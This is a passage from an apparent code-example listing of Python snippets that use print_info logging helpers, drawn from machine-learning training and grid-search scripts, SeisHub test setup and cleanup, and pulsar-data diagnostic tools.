            cost = model.forward(d.x_train, d.y_train)
            model.backward()
            g_tilde = np.copy(model.lin_layer.weight.offset_grad)

            # Cache the results.
            for batch_index in range(0, d.num_batches):
                x, y = d.get_data(batch_index)
                model.forward_store(x, y, batch_index)
                model.backward_store(batch_index)

        cost = 0
        for batch_index in range(0, d.num_batches):
            x, y = d.get_data(batch_index)

            cost += model.forward_inner(x, y, batch_index)
            model.backward_inner(batch_index)
            model.step_svrg_inner(g_tilde, batch_index)

        predY = model.predict_inner(d.x_test)
        utils.print_info(epoch, cost / d.num_batches,
                         100 * np.mean(predY == d.y_test))
Example #38
def init_seishub_instance(debug=False):
    """
    Creates a new SeisHub instance at TEST_DIRECTORY.

    :param debug: If debug is True, the output will not be caught.
    """
    print_info("Creating new SeisHub instance in %s..." % TEST_DIRECTORY)

    if os.path.exists(TEST_DIRECTORY):
        msg = "SeisHub temp directory already exists."
        print_error(msg)
        sys.exit(1)

    cmd = ["seishub-admin", "initenv", TEST_DIRECTORY]
    try:
        if debug is True:
            subprocess.call(cmd)
        else:
            subprocess.check_output(cmd, stderr=subprocess.STDOUT)
    except subprocess.CalledProcessError, e:
        print_error("Error creating seishub instance. Exited with return "
            "code %s. Full output follows:" % (str(e.returncode)))
        print ""
        print e.output
        print ""
        sys.exit(1)
Example #39
  def set_layer_sizes(self, h):
    if isinstance(h, str):
      ut.print_info('new layer sizes: %s' % h)
      h = h.replace('/', '|')
      h = list(map(int, h.split('|')))
    self.layers = h
    self.layer_narrow = np.argmin(h)
    print(self.layers, self.layer_narrow)
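For example, the string form parses like this (`model` is a hypothetical instance, shown only to illustrate the parsing):

model.set_layer_sizes('500/3/500')
# '500/3/500' -> '500|3|500' -> [500, 3, 500]
# layer_narrow = np.argmin([500, 3, 500]) = 1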
Example #40
def visualize_latest_from_visualization_folder(folder='./visualizations/', file=None):
  if file is None:
    file = ut.get_latest_file(folder, filter=r'.*\d+\.txt$')
    ut.print_info('Encoding file: %s' % file.split('/')[-1])
  data = np.loadtxt(file)  # [0:360]
  fig = plt.figure()
  vi.visualize_encodings(data, fast=fast, fig=fig, interactive=True)
  fig.suptitle(file.split('/')[-1])
  fig.tight_layout()
  plt.show()
Example #41
def search_learning_rate(lrs=[100, 5, 0.5, 0.1, 0.01, 0.001], epochs=None):
    best_q, best_r = None, None
    res = []
    for lr in lrs:
        q = main(learning_rate=lr) if epochs is None else main(learning_rate=lr, epochs=epochs)
        res.append('\n\r lr:%.4f \tq:%.2f' % (lr, q))
        if best_q is None or best_q > q:
            best_q = q
            best_r = lr
    print(''.join(res))
    ut.print_info('BEST Q: %d IS ACHIEVED FOR LR: %f' % (best_q, best_r), 36)
Example #42
def rescale_ds(ds, min, max):
  ut.print_info('rescale call: (min: %s, max: %s) %d' % (str(min), str(max), len(ds)))
  if max is None:
    return np.asarray(ds) - np.min(ds)
  ds_min, ds_max = np.min(ds), np.max(ds)
  ds_gap = ds_max - ds_min
  scale_factor = (max - min) / ds_gap
  ds = np.asarray(ds) * scale_factor
  shift_factor = min - np.min(ds)
  ds += shift_factor
  return ds
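A quick sanity check of the rescaling with illustrative values (assumes the module's `ut` logger is importable):

import numpy as np

ds = rescale_ds(np.array([0., 5., 10.]), -1, 1)
# scale_factor = (1 - -1) / 10 = 0.2 -> [0., 1., 2.], then shifted to start at -1
assert np.allclose(ds, [-1., 0., 1.])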
Example #43
    def _compute(self):
        utils.print_info("Creating profile plot for %s" % self.fn, 3)
        params = utils.prep_file(self.fn)
        handle, tmpfn = tempfile.mkstemp(suffix=".png")
        os.close(handle)
        cmd = ["psrplot", "-p", "flux", "-j", "TDFp", "-c", \
               "above:c=%s" % os.path.split(self.fn)[-1], \
               "-D", "%s/PNG" % tmpfn, self.fn]
        utils.execute(cmd)
        tmpdir = os.path.split(tmpfn)[0]
        pngfn = os.path.join(tmpdir, self.fn + ".flux.png")
        shutil.move(tmpfn, pngfn)
        return pngfn
Example #44
def visualize_from_checkpoint(checkpoint, epoch=None):
  assert os.path.exists(checkpoint)
  FLAGS.load_from_checkpoint = checkpoint
  file_filter = r'.*\d+\.txt$' if epoch is None else r'.*e\|%d.*' % epoch
  latest_file = ut.get_latest_file(folder=checkpoint, filter=file_filter)
  print(latest_file)
  ut.print_info('Encoding file: %s' % latest_file.split('/')[-1])
  data = np.loadtxt(latest_file)
  fig = plt.figure()
  fig.set_size_inches(fig.get_size_inches()[0] * 2, fig.get_size_inches()[1] * 2)
  entity = EncodingVisualizer(fig, data)
  # fig.tight_layout()
  plt.show()
Example #45
  def _build_encoder(self):
    """Construct encoder network: placeholders, operations, optimizer"""
    self._input = tf.placeholder(tf.float32, self._batch_shape, name='input')

    self._encode = (pt.wrap(self._input)
                    .flatten())

    for i in range(self.layer_narrow + 1):
      size, desc = self.layers[i], 'enc_hidden_%d' % i
      self._encode = self._encode.fully_connected(size, name=desc)
      if i == self.layer_narrow-1 or i == self.layer_narrow-2:
        ut.print_info('Dropout. layer:%d, layer_size:%d, DO_value:%f' % (i, self.layers[i], 1.0-FLAGS.dropout))
        self._encode = self._encode.dropout(1.0-FLAGS.dropout)
Example #46
def stop_seishub_server(proc):
    """
    Terminates the passed process object.
    """
    proc.terminate()
    proc.kill()
    proc.wait()

    # Wait for a short time and then just kill it. Quite brute force, but the
    # only reliable way I could find.
    time.sleep(0.2)
    os.system('pkill -f "python -m seishub.core.daemon"')

    print_info("SeisHub Server terminated.")
Example #47
def main(args):
    matches = find_overlaps(args.rawfile)
    utils.print_info("Number of overlapping files in DB: %d" % \
                        len(matches), 1)
    lines = ["Overlapping files:"]
    if matches:
        for match in matches:
            fn = os.path.join(match['filepath'], match['filename'])
            lines.append("    %s" % fn)
    else:
        lines.append("    None")    
    msg = "\n".join(lines)
    utils.print_info(msg, 2)
    sys.exit(len(matches))
Example #48
def main(args):
    if args.timfile_id is None:
        raise errors.BadInputError("A timfile_id must be provided!")

    # Connect to the database
    db = database.Database()
    db.connect()

    try:
        utils.print_info("Timfile ID to set as master: %d" % args.timfile_id, 1)
        if not args.dry_run:
            set_as_master_timfile(args.timfile_id, db)
    finally:
        # Close DB connection
        db.close()
Example #49
  def fetch_datasets(self, activation_func_bounds):
    original_data, filters = inp.get_images(FLAGS.input_path)
    assert len(filters) == len(original_data)
    original_data, filters = self.bloody_hack_filterbatches(original_data, filters)
    ut.print_info('shapes. data, filters: %s' % str((original_data.shape, filters.shape)))

    original_data = inp.rescale_ds(original_data, activation_func_bounds.min, activation_func_bounds.max)
    self._image_shape = inp.get_image_shape(FLAGS.input_path)

    if DEV:
      original_data = original_data[:300]

    self.epoch_size = math.ceil(len(original_data) / FLAGS.batch_size)
    self.test_size = math.ceil(len(original_data) / FLAGS.batch_size)
    return original_data, filters
Example #50
def manual_pca(data):
  """remove meaningless dimensions"""
  std = data[0:300].std(axis=0)

  order = np.argsort(std)[::-1]
  # order = np.arange(0, data.shape[1]).astype(np.int32)
  std = std[order]
  # filter components by STD but take at least 3

  meaningless = [order[i] for i, x in enumerate(std) if x <= STD_THRESHOLD]
  if any(meaningless) and data.shape[1] > 3:
    ut.print_info('meaningless dimensions on visualization: %s' % str(meaningless))

  order = [order[i] for i, x in enumerate(std) if x > STD_THRESHOLD or i < 3]
  order.sort()
  return data[:, order]
Example #51
def cleanup():
    """
    Simply removes the temporarily created SeisHub instance.
    """
    print_info("Cleaning up...")

    # Try deleting it for some seconds...
    t = time.time()
    while (time.time() - t) < 10.0:
        time.sleep(0.1)
        try:
            if os.path.exists(TEST_DIRECTORY):
                shutil.rmtree(TEST_DIRECTORY)
            return
        except:
            pass
    print_error("Cleanup failed.")
Example #52
def main():
    # Connect to the database
    db = database.Database()
    db.connect()

    try:
        if args.parfile is not None:
            # parfile filename provided. Get parfile_id
            parfile_id = utils.get_parfile_id(args.parfile, db)
        else:
            parfile_id = args.parfile_id
        utils.print_info("Parfile ID to set as master: %d" % parfile_id, 1)
        if not args.dry_run:
            utils.set_as_master_parfile(parfile_id, db)
    finally:
        # Close DB connection
        db.close()
Example #53
    def _compute(self):
        utils.print_info("Creating freq vs. phase plot for %s" % self.fn, 3)
        params = utils.prep_file(self.fn)
        if not (params['nchan'] > 1):
            raise errors.DiagnosticNotApplicable("Archive (%s) only has " \
                        "a single channel. Freq vs. phase diagnostic " \
                        "doesn't apply to this data file." % self.fn)

        handle, tmpfn = tempfile.mkstemp(suffix=".png")
        os.close(handle)
        cmd = ["psrplot", "-p", "freq", "-j", "DTp", "-c", \
               "above:c=%s" % os.path.split(self.fn)[-1], \
               "-D", "%s/PNG" % tmpfn, "%s" % self.fn]
        utils.execute(cmd)
        tmpdir = os.path.split(tmpfn)[0]
        pngfn = os.path.join(tmpdir, self.fn + ".freq.png")
        shutil.move(tmpfn, pngfn)
        return pngfn
Example #54
def main(args):
    # Connect to the database
    db = database.Database()
    db.connect()

    try:
        if args.template is not None:
            utils.print_info("Getting template ID for %s using filename and md5" % args.template, 1)
            # template filename provided. Get template_id
            template_id = utils.get_template_id(args.template, db)
        else:
            template_id = args.template_id
        utils.print_info("Template ID to set as master: %d" % template_id, 1)
        if not args.dry_run:
            utils.set_as_master_template(template_id, db)
    finally:
        # Close DB connection
        db.close()
Example #55
  def train(self, epochs_to_train=5):
    meta = self.get_meta()
    ut.print_time('train started: \n%s' % ut.to_file_name(meta))
    # return meta, np.random.randn(epochs_to_train)
    ut.configure_folders(FLAGS, meta)

    self._dataset, self._filters = self.fetch_datasets(self._activation)
    self.build_model()
    self._register_training_start()

    with tf.Session() as sess:
      sess.run(tf.initialize_all_variables())
      self._saver = tf.train.Saver()

      if FLAGS.load_state and os.path.exists(self.get_checkpoint_path()):
        self._saver.restore(sess, self.get_checkpoint_path())
        ut.print_info('Restored requested. Previous epoch: %d' % self.get_past_epochs(), color=31)

      # MAIN LOOP
      for current_epoch in xrange(epochs_to_train):

        feed, permutation = self._get_epoch_dataset()
        for _, batch in enumerate(feed):
          filter = batch[1][0]
          assert batch[1][0,0] == batch[1][-1,0]
          encoding, = sess.run([self._encode], feed_dict={self._input: batch[0]})   # 1.1 encode forward
          clamped_enc, vae_grad = _clamp(encoding, filter)                          # 1.2 # clamp

          sess.run(self._assign_clamped, feed_dict={self._clamped:clamped_enc})
          reconstruction, loss, clamped_gradient, _ = sess.run(          # 2.1 decode forward+backward
            [self._decode, self._decoder_loss, self._clamped_grad, self._train_decoder],
            feed_dict={self._clamped: clamped_enc, self._reconstruction: batch[0]})

          declamped_grad = _declamp_grad(vae_grad, clamped_gradient, filter) # 2.2 prepare gradient
          _, step = sess.run(                                            # 3.0 encode backward path
            [self._train_encoder, self._step],
            feed_dict={self._input: batch[0], self._encoding: encoding-declamped_grad})          # Profit

          self._register_batch(batch, encoding, reconstruction, loss)
        self._register_epoch(current_epoch, epochs_to_train, permutation, sess)
      self._writer = tf.train.SummaryWriter(FLAGS.logdir, sess.graph)
      meta = self._register_training()
    return meta, self._stats['epoch_accuracy']
Example #56
def print_data(data, fig, subplot, is_3d=True):
  colors = np.arange(0, 180)
  colors = np.concatenate((colors, colors[::-1]))
  colors = vi.duplicate_array(colors, total_length=len(data))

  if is_3d:
    subplot = fig.add_subplot(subplot, projection='3d')
    subplot.set_title('All data')
    subplot.scatter(data[:, 0], data[:, 1], data[:, 2], c=colors, cmap=plt.cm.Spectral, picker=5)
  else:
    subsample = data[0:360] if len(data) < 2000 else data[0:720]
    subsample = np.concatenate((subsample, subsample))[0:len(subsample)+1]
    ut.print_info('subsample shape %s' % str(subsample.shape))
    subsample_colors = colors[0:len(subsample)]
    subplot = fig.add_subplot(subplot)
    subplot.set_title('First 360 elem')
    subplot.plot(subsample[:, 0], subsample[:, 1], picker=0)
    subplot.plot(subsample[0, 0], subsample[0, 1], picker=0)
    subplot.scatter(subsample[:, 0], subsample[:, 1], s=50, c=subsample_colors,
                    cmap=plt.cm.Spectral, picker=5)
  return subplot
Example #57
def search_learning_rate(lrs=[0.001, 0.0004, 0.0001, 0.00003,],
                         epochs=500):
  FLAGS.suffix = 'grid_lr'
  ut.print_info('START: search_learning_rate', color=31)

  best_result, best_args = None, None
  result_summary, result_list = [], []

  for lr in lrs:
    ut.print_info('STEP: search_learning_rate', color=31)
    FLAGS.learning_rate = lr
    model = model_class()
    meta, accuracy_by_epoch = model.train(epochs)
    result_list.append((ut.to_file_name(meta), accuracy_by_epoch))
    best_accuracy = np.min(accuracy_by_epoch)
    result_summary.append('\n\r lr:%2.5f \tq:%.2f' % (lr, best_accuracy))
    if best_result is None or best_result > best_accuracy:
      best_result = best_accuracy
      best_args = lr

  meta = {'suf': 'grid_lr_bs', 'e': epochs, 'lrs': lrs, 'acu': best_result,
          'bs': FLAGS.batch_size, 'h': model.get_layer_info()}
  pickle.dump(result_list, open('search_learning_rate%d.txt' % epochs, "wb"))
  ut.plot_epoch_progress(meta, result_list)
  print(''.join(result_summary))
  ut.print_info('BEST Q: %d IS ACHIEVED FOR LR: %f' % (best_result, best_args), 36)
Example #58
def search_batch_size(bss=[50], strides=[1, 2, 5, 20], epochs=500):
  FLAGS.suffix = 'grid_bs'
  ut.print_info('START: search_batch_size', color=31)
  best_result, best_args = None, None
  result_summary, result_list = [], []

  print(bss)
  for bs in bss:
    for stride in strides:
      ut.print_info('STEP: search_batch_size %d %d' % (bs, stride), color=31)
      FLAGS.batch_size = bs
      FLAGS.stride = stride
      model = model_class()
      start = dt.now()
      # meta, accuracy_by_epoch = model.train(epochs * int(bs / bss[0]))
      meta, accuracy_by_epoch = model.train(epochs)
      meta['str'] = stride
      meta['t'] = int((dt.now() - start).seconds)
      result_list.append((ut.to_file_name(meta)[22:], accuracy_by_epoch))
      best_accuracy = np.min(accuracy_by_epoch)
      result_summary.append('\n\r bs:%d \tst:%d \tq:%.2f' % (bs, stride, best_accuracy))
      if best_result is None or best_result > best_accuracy:
        best_result = best_accuracy
        best_args = (bs, stride)

  meta = {'suf': 'grid_batch_bs', 'e': epochs, 'acu': best_result,
          'h': model.get_layer_info()}
  pickle.dump(result_list, open('search_batch_size%d.txt' % epochs, "wb"))
  ut.plot_epoch_progress(meta, result_list)
  print(''.join(result_summary))

  ut.print_info('BEST Q: %d IS ACHIEVED FOR bs, st: %d %d' % (best_result, best_args[0], best_args[1]), 36)
Example #59
def search_layer_sizes(epochs=500):
  FLAGS.suffix = 'grid_h'
  ut.print_info('START: search_layer_sizes', color=31)
  best_result, best_args = None, None
  result_summary, result_list = [], []

  for _, h_encoder in enumerate([300, 700, 2500]):
    for _, h_decoder in enumerate([300, 700, 2500]):
      for _, h_narrow in enumerate([3]):
        model = model_class()
        model.layer_encoder = h_encoder
        model.layer_narrow = h_narrow
        model.layer_decoder = h_decoder
        layer_info = str(model.get_layer_info())
        ut.print_info('STEP: search_layer_sizes: ' + str(layer_info), color=31)

        meta, accuracy_by_epoch = model.train(epochs)
        result_list.append((layer_info, accuracy_by_epoch))
        best_accuracy = np.min(accuracy_by_epoch)
        result_summary.append('\n\r h:%s \tq:%.2f' % (layer_info, best_accuracy))
        if best_result is None or best_result > best_accuracy:
          best_result = best_accuracy
          best_args = layer_info

  meta = {'suf': 'grid_H_bs', 'e': epochs, 'acu': best_result,
          'bs': FLAGS.batch_size, 'h': model.get_layer_info()}
  print(''.join(result_summary))
  pickle.dump(result_list, open('search_layer_sizes%d.txt' % epochs, "wb"))
  ut.print_info('BEST Q: %d IS ACHIEVED FOR H: %s' % (best_result, best_args), 36)
  ut.plot_epoch_progress(meta, result_list)